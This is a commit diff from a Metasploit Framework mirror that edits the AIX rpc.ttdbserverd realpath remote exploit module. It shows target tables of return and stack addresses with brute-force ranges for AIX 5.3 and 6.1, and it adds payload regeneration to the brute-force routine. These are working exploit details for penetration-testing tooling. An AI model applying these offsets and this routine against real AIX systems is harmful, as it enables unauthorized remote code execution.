infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Regenerate the payload with the specified AIX level, cleanups 

git-svn-id: file:///home/svn/framework3/trunk@8427 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-02-09 04:15:47 +00:00
parent e7f7ac20ea
commit 48a159006a
1 changed files with 22 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

49
modules/exploits/aix/rpc_ttdbserverd_realpath.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
@ -40,9 +40,9 @@ class Metasploit3 < Msf::Exploit::Remote
{
'BadChars' => "\x00",
},
'Targets' =>
'Targets' =>
[
[
[
'IBM AIX Version 6.1.4',
{
'Arch' => 'ppc',
@ -50,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099430-8192 },
@ -59,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 6.1.3',
{
'Arch' => 'ppc',
@ -67,7 +66,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3',
'Payload' => { 'AIX' => '6.1.3' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
@ -76,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 6.1.2',
{
'Arch' => 'ppc',
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2',
'Payload' => { 'AIX' => '6.1.2' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
@ -93,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 6.1.1',
{
'Arch' => 'ppc',
@ -101,7 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1',
'Payload' => { 'AIX' => '6.1.1' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
@ -110,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 6.1.0',
{
'Arch' => 'ppc',
@ -118,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0',
'Payload' => { 'AIX' => '6.1.0' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
@ -127,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
{
'Arch' => 'ppc',
@ -135,7 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
@ -144,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 5.3.10',
{
'Arch' => 'ppc',
@ -152,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096bf0-8192 },
@ -161,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 5.3.9',
{
'Arch' => 'ppc',
@ -169,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
@ -178,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 5.3.8',
{
'Arch' => 'ppc',
@ -186,7 +178,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8',
'Payload' => { 'AIX' => '5.3.8' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
@ -195,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'IBM AIX Version 5.3.7',
{
'Arch' => 'ppc',
@ -203,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7',
'Payload' => { 'AIX' => '5.3.7' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
@ -212,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'Debug IBM AIX Version 6.1',
{
'Arch' => 'ppc',
@ -220,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
@ -229,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
],
[
[
'Debug IBM AIX Version 5.3',
{
'Arch' => 'ppc',
@ -237,7 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
@ -252,8 +240,15 @@ class Metasploit3 < Msf::Exploit::Remote
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
begin
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
sunrpc_create('tcp', 100083, 1)